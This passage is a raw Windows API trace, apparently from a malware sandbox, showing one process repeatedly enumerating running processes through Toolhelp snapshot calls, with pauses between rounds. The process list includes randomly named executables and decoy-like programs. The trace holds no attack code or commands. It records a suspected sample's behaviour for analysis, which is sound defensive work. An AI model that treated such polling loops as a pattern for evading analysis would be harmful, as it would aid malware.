lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.613] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.614] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0100.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.619] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.622] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0100.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0100.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0100.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb68, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0100.627] CloseHandle (hObject=0xbc) returned 1 [0100.627] Sleep (dwMilliseconds=0x12c) [0100.947] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0100.952] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.953] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.958] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.969] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.970] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.971] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.973] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0100.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0100.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0100.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0100.978] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0100.979] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0100.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0100.981] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0100.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0100.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.030] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.035] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.037] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.043] CloseHandle (hObject=0xc4) returned 1 [0101.043] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.049] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, 
dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0101.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.105] Process32NextW 